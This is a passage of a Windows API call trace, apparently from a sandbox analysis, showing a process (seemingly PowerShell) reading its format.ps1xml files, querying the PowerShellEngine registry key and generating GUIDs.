	[0805.553] ReadFile (in: hFile=0x2ec, lpBuffer=0x3266fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3266fb8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0805.554] ReadFile (in: hFile=0x2ec, lpBuffer=0x3266fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3266fb8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0805.555] ReadFile (in: hFile=0x2ec, lpBuffer=0x3266fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3266fb8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.443] ReadFile (in: hFile=0x2ec, lpBuffer=0x3266fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3266fb8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.443] ReadFile (in: hFile=0x2ec, lpBuffer=0x3266fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3266fb8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.444] ReadFile (in: hFile=0x2ec, lpBuffer=0x3266fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3266fb8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.444] ReadFile (in: hFile=0x2ec, lpBuffer=0x3266fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3266fb8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.444] ReadFile (in: hFile=0x2ec, lpBuffer=0x3266fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3266fb8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.445] ReadFile (in: hFile=0x2ec, lpBuffer=0x3266fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3266fb8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.445] ReadFile (in: hFile=0x2ec, lpBuffer=0x3266fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3266fb8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.448] ReadFile (in: hFile=0x2ec, lpBuffer=0x3266fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3266fb8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.449] ReadFile (in: hFile=0x2ec, lpBuffer=0x3266fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3266fb8*, lpNumberOfBytesRead=0x16d418*=0xbce, lpOverlapped=0x0) returned 1
	[0806.449] ReadFile (in: hFile=0x2ec, lpBuffer=0x32666ee, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32666ee*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0806.449] ReadFile (in: hFile=0x2ec, lpBuffer=0x3266fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3266fb8*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0806.449] CloseHandle (hObject=0x2ec) returned 1
	[0806.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0806.449] SetErrorMode (uMode=0x1) returned 0x1
	[0806.449] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d3c0 | out: lpFileInformation=0x16d3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0806.450] SetErrorMode (uMode=0x1) returned 0x1
	[0806.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0806.450] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4a8 | out: phkResult=0x16d4a8*=0x2ec) returned 0x0
	[0806.450] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d42c, lpData=0x0, lpcbData=0x16d428*=0x0 | out: lpType=0x16d42c*=0x1, lpData=0x0, lpcbData=0x16d428*=0x56) returned 0x0
	[0806.450] CoTaskMemAlloc (cb=0x5a) returned 0x2b6db0
	[0806.450] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3fc, lpData=0x2b6db0, lpcbData=0x16d3f8*=0x56 | out: lpType=0x16d3fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d3f8*=0x56) returned 0x0
	[0806.450] CoTaskMemFree (pv=0x2b6db0) 
	[0806.450] RegCloseKey (hKey=0x2ec) returned 0x0
	[0806.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0806.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0806.452] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x5d6e771e, Data2=0x72ad, Data3=0x4f81, Data4=([0]=0x8f, [1]=0x65, [2]=0x92, [3]=0x58, [4]=0xe4, [5]=0xca, [6]=0x47, [7]=0xb))) returned 0x0
	[0806.452] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x1413c470, Data2=0x9dc5, Data3=0x44cb, Data4=([0]=0xac, [1]=0x4e, [2]=0x5, [3]=0xde, [4]=0x77, [5]=0xb1, [6]=0xd4, [7]=0xb6))) returned 0x0
	[0806.452] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x6b6f2fd5, Data2=0x28bc, Data3=0x4ce4, Data4=([0]=0x8b, [1]=0xeb, [2]=0x4b, [3]=0x95, [4]=0x6b, [5]=0x12, [6]=0xfa, [7]=0xef))) returned 0x0
	[0806.452] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x4baffd55, Data2=0x8025, Data3=0x4b2c, Data4=([0]=0x90, [1]=0xd1, [2]=0x29, [3]=0x20, [4]=0xe0, [5]=0x3b, [6]=0xa1, [7]=0x35))) returned 0x0
	[0806.453] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xfbfa8d08, Data2=0x8e67, Data3=0x4c89, Data4=([0]=0xbf, [1]=0x54, [2]=0x3a, [3]=0xd8, [4]=0x33, [5]=0x82, [6]=0xaf, [7]=0xe0))) returned 0x0
	[0806.453] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x454978ac, Data2=0x6f1f, Data3=0x41ef, Data4=([0]=0x8f, [1]=0x92, [2]=0x6d, [3]=0xb5, [4]=0x6f, [5]=0x50, [6]=0x7e, [7]=0xb0))) returned 0x0
	[0806.453] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xfd068121, Data2=0xd005, Data3=0x4d59, Data4=([0]=0x8f, [1]=0xdf, [2]=0x41, [3]=0xa, [4]=0x52, [5]=0x17, [6]=0xe2, [7]=0x17))) returned 0x0
	[0806.453] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x3435fa1e, Data2=0xc1be, Data3=0x4bb6, Data4=([0]=0x9b, [1]=0x3f, [2]=0x79, [3]=0xed, [4]=0xaa, [5]=0xc0, [6]=0x6c, [7]=0x1))) returned 0x0
	[0806.453] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x46a11f0c, Data2=0xc82f, Data3=0x4637, Data4=([0]=0xb0, [1]=0x77, [2]=0x80, [3]=0x18, [4]=0x99, [5]=0xed, [6]=0x3c, [7]=0x91))) returned 0x0
	[0806.453] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xfd429a68, Data2=0x62f, Data3=0x4e73, Data4=([0]=0x99, [1]=0x1a, [2]=0x2b, [3]=0x64, [4]=0xda, [5]=0xbd, [6]=0x10, [7]=0xa8))) returned 0x0
	[0806.454] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xf78a25ae, Data2=0xff32, Data3=0x41a4, Data4=([0]=0xb7, [1]=0x6b, [2]=0xc4, [3]=0x9, [4]=0x7, [5]=0x8a, [6]=0xe8, [7]=0xe0))) returned 0x0
	[0806.454] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xa4666cf7, Data2=0x7563, Data3=0x4855, Data4=([0]=0x82, [1]=0x91, [2]=0xb9, [3]=0x48, [4]=0xa1, [5]=0xc7, [6]=0xee, [7]=0x6d))) returned 0x0
	[0806.454] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xc9d9489e, Data2=0xa981, Data3=0x47f6, Data4=([0]=0xb0, [1]=0x11, [2]=0xb5, [3]=0xc1, [4]=0xff, [5]=0xea, [6]=0xb5, [7]=0x1a))) returned 0x0
	[0806.456] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xcfb12ab4, Data2=0xa962, Data3=0x466b, Data4=([0]=0x82, [1]=0x66, [2]=0xe1, [3]=0x2a, [4]=0x1, [5]=0x93, [6]=0xe9, [7]=0x9c))) returned 0x0
	[0806.456] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xe0d912ad, Data2=0xa99c, Data3=0x4a0c, Data4=([0]=0x8a, [1]=0xb, [2]=0x79, [3]=0xad, [4]=0x5d, [5]=0x1c, [6]=0xe8, [7]=0xad))) returned 0x0
	[0806.456] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xfabb80fd, Data2=0x7c1f, Data3=0x4073, Data4=([0]=0x88, [1]=0xa2, [2]=0x46, [3]=0x5e, [4]=0xf7, [5]=0xc2, [6]=0x9d, [7]=0xe3))) returned 0x0
	[0806.456] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x6c05fc2f, Data2=0xc3c, Data3=0x4e6d, Data4=([0]=0xac, [1]=0x6a, [2]=0x37, [3]=0x46, [4]=0xe1, [5]=0xdd, [6]=0x71, [7]=0x12))) returned 0x0
	[0806.456] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xbf2bd80, Data2=0xb15c, Data3=0x4045, Data4=([0]=0x8d, [1]=0x8c, [2]=0x54, [3]=0x9f, [4]=0xfd, [5]=0xc5, [6]=0x5a, [7]=0xbf))) returned 0x0
	[0806.456] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x7b84557a, Data2=0x5784, Data3=0x4055, Data4=([0]=0x9c, [1]=0xb6, [2]=0xfc, [3]=0x8b, [4]=0x34, [5]=0xed, [6]=0xce, [7]=0x6e))) returned 0x0
	[0806.456] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x672cb40f, Data2=0xff08, Data3=0x41ec, Data4=([0]=0x8f, [1]=0xd3, [2]=0xec, [3]=0x67, [4]=0x95, [5]=0x1, [6]=0x40, [7]=0x6d))) returned 0x0
	[0806.457] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x26295bfb, Data2=0xec9b, Data3=0x4a24, Data4=([0]=0x83, [1]=0x96, [2]=0x4, [3]=0x89, [4]=0xcd, [5]=0x1a, [6]=0xb5, [7]=0x1f))) returned 0x0
	[0806.457] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xd246ae4b, Data2=0xc5a9, Data3=0x4034, Data4=([0]=0x83, [1]=0x27, [2]=0x6d, [3]=0x35, [4]=0x4d, [5]=0x11, [6]=0x15, [7]=0x84))) returned 0x0
	[0806.457] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x103545f5, Data2=0x8053, Data3=0x4e5b, Data4=([0]=0xb3, [1]=0xe5, [2]=0x71, [3]=0xbe, [4]=0xb2, [5]=0x8a, [6]=0x3f, [7]=0x9d))) returned 0x0
	[0806.457] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x27517bb1, Data2=0x43cf, Data3=0x4b42, Data4=([0]=0x82, [1]=0x4a, [2]=0x86, [3]=0x67, [4]=0x34, [5]=0x74, [6]=0xf2, [7]=0x8f))) returned 0x0
	[0806.457] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x12af4004, Data2=0x7e7c, Data3=0x4465, Data4=([0]=0x8c, [1]=0xfb, [2]=0x90, [3]=0xac, [4]=0x1b, [5]=0xf3, [6]=0x43, [7]=0x5c))) returned 0x0
	[0806.457] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x5945959b, Data2=0x495f, Data3=0x4c73, Data4=([0]=0xa4, [1]=0xc5, [2]=0xf4, [3]=0x3, [4]=0x52, [5]=0x59, [6]=0xd7, [7]=0x54))) returned 0x0
	[0806.457] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xf0e5aab9, Data2=0x1aff, Data3=0x4ae2, Data4=([0]=0xae, [1]=0x74, [2]=0x10, [3]=0xaa, [4]=0xcc, [5]=0xb9, [6]=0x85, [7]=0x37))) returned 0x0
	[0806.458] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xef5c1f2b, Data2=0x457e, Data3=0x409f, Data4=([0]=0x8c, [1]=0xdf, [2]=0x28, [3]=0x28, [4]=0x47, [5]=0xd, [6]=0x96, [7]=0xa2))) returned 0x0
	[0806.458] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xc6793a8b, Data2=0x5484, Data3=0x42c0, Data4=([0]=0x8e, [1]=0x20, [2]=0x45, [3]=0xf9, [4]=0xe, [5]=0xa, [6]=0x72, [7]=0xa3))) returned 0x0
	[0806.458] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xc0f0f85f, Data2=0x624, Data3=0x4da9, Data4=([0]=0x90, [1]=0x69, [2]=0xd2, [3]=0x1d, [4]=0x5, [5]=0x82, [6]=0x17, [7]=0x53))) returned 0x0
	[0806.458] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xfdcae8e9, Data2=0xceb2, Data3=0x4edd, Data4=([0]=0xb1, [1]=0x9, [2]=0xd5, [3]=0xec, [4]=0x39, [5]=0x5d, [6]=0x4, [7]=0x37))) returned 0x0
	[0806.458] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x2f3721b1, Data2=0xe4a6, Data3=0x46d8, Data4=([0]=0xb5, [1]=0x1e, [2]=0xdc, [3]=0x50, [4]=0xeb, [5]=0x6b, [6]=0x4c, [7]=0xf2))) returned 0x0
	[0806.458] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x7e020825, Data2=0x283b, Data3=0x4dff, Data4=([0]=0xbd, [1]=0x91, [2]=0xc6, [3]=0x16, [4]=0x7e, [5]=0xc2, [6]=0x64, [7]=0xb8))) returned 0x0
	[0806.458] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x1dcff184, Data2=0x8a02, Data3=0x478b, Data4=([0]=0x8c, [1]=0x0, [2]=0x83, [3]=0xdb, [4]=0xb4, [5]=0x85, [6]=0x2c, [7]=0x7))) returned 0x0
	[0806.459] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xbe6c7a01, Data2=0x5264, Data3=0x459c, Data4=([0]=0x87, [1]=0xd5, [2]=0xbe, [3]=0x12, [4]=0xa2, [5]=0xab, [6]=0x97, [7]=0xdb))) returned 0x0
	[0806.459] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xe1c5c7ac, Data2=0x1f04, Data3=0x4e06, Data4=([0]=0xa1, [1]=0xd5, [2]=0x64, [3]=0x97, [4]=0x8c, [5]=0xbf, [6]=0x70, [7]=0xd8))) returned 0x0
	[0806.459] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x4ae05c50, Data2=0x50c9, Data3=0x4643, Data4=([0]=0xa4, [1]=0x9d, [2]=0x88, [3]=0x71, [4]=0x4, [5]=0x24, [6]=0x80, [7]=0xb3))) returned 0x0
	[0806.460] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2ec
	[0806.460] GetFileType (hFile=0x2ec) returned 0x1
	[0806.460] SetErrorMode (uMode=0x1) returned 0x1
	[0806.460] GetFileType (hFile=0x2ec) returned 0x1
	[0806.460] ReadFile (in: hFile=0x2ec, lpBuffer=0x3377728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3377728*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.460] ReadFile (in: hFile=0x2ec, lpBuffer=0x3377728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3377728*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.460] ReadFile (in: hFile=0x2ec, lpBuffer=0x3377728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3377728*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.461] ReadFile (in: hFile=0x2ec, lpBuffer=0x3377728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3377728*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.461] ReadFile (in: hFile=0x2ec, lpBuffer=0x3377728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3377728*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.461] ReadFile (in: hFile=0x2ec, lpBuffer=0x3377728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3377728*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.461] ReadFile (in: hFile=0x2ec, lpBuffer=0x3377728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3377728*, lpNumberOfBytesRead=0x16d418*=0x119, lpOverlapped=0x0) returned 1
	[0806.461] ReadFile (in: hFile=0x2ec, lpBuffer=0x3377728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3377728*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0806.461] CloseHandle (hObject=0x2ec) returned 1
	[0806.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0806.462] SetErrorMode (uMode=0x1) returned 0x1
	[0806.462] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d3c0 | out: lpFileInformation=0x16d3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0806.462] SetErrorMode (uMode=0x1) returned 0x1
	[0806.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0806.462] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4a8 | out: phkResult=0x16d4a8*=0x2ec) returned 0x0
	[0806.462] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d42c, lpData=0x0, lpcbData=0x16d428*=0x0 | out: lpType=0x16d42c*=0x1, lpData=0x0, lpcbData=0x16d428*=0x56) returned 0x0
	[0806.463] CoTaskMemAlloc (cb=0x5a) returned 0x2b6db0
	[0806.463] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3fc, lpData=0x2b6db0, lpcbData=0x16d3f8*=0x56 | out: lpType=0x16d3fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d3f8*=0x56) returned 0x0
	[0806.463] CoTaskMemFree (pv=0x2b6db0) 
	[0806.463] RegCloseKey (hKey=0x2ec) returned 0x0
	[0806.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0806.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0806.464] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x5d7f03ad, Data2=0xf08c, Data3=0x46da, Data4=([0]=0x9a, [1]=0x48, [2]=0x76, [3]=0x94, [4]=0x2d, [5]=0x6, [6]=0x50, [7]=0x23))) returned 0x0
	[0806.464] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x903fde69, Data2=0x34d9, Data3=0x475f, Data4=([0]=0x85, [1]=0x48, [2]=0x6, [3]=0xc7, [4]=0x66, [5]=0x52, [6]=0xae, [7]=0xc7))) returned 0x0
	[0806.464] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x10d75aa2, Data2=0x1616, Data3=0x42ed, Data4=([0]=0x95, [1]=0x50, [2]=0xdf, [3]=0x44, [4]=0xf8, [5]=0x15, [6]=0xe7, [7]=0x35))) returned 0x0
	[0806.464] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xcbe03801, Data2=0x82e0, Data3=0x41b6, Data4=([0]=0x85, [1]=0x69, [2]=0x97, [3]=0x57, [4]=0xf4, [5]=0xca, [6]=0x74, [7]=0x45))) returned 0x0
	[0806.465] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2ec
	[0806.465] GetFileType (hFile=0x2ec) returned 0x1
	[0806.465] SetErrorMode (uMode=0x1) returned 0x1
	[0806.465] GetFileType (hFile=0x2ec) returned 0x1
	[0806.465] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.465] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.465] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.466] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.467] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.467] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0806.468] ReadFile (in: hFile=0x2ec, lpBuffer=0x33d38c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x33d38c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
